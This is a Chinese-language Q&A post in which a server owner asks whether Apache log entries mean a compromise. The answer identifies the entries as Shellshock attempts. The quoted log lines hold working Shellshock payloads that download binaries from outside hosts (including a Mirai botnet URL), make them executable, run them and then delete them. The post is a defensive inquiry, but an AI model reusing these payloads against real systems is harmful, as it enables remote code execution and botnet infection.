Apache日志显示命令执行情况。

Question

，我想知道我的服务器是否被破坏了。我只是看了一下日志，看到了下面的一行：

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

我不确定他们是否能够成功地执行该命令。我关闭了服务器。

Answer 1

虽然从服务器日志中可以看到有人试图使用谢尔休克脆弱性进行攻击，但如果攻击成功，则不可能仅根据此日志进行判断。

您的第一个检查可能应该是针对此类漏洞的找出您的系统是否易受攻击。如果您的系统有当前的更新，则不应发生这种情况。如果您的系统易受攻击，那么您应该将其视为已被破坏的系统，无论是来自最近的攻击尝试，还是来自较早的尝试，因为该漏洞已知和利用已有很长一段时间。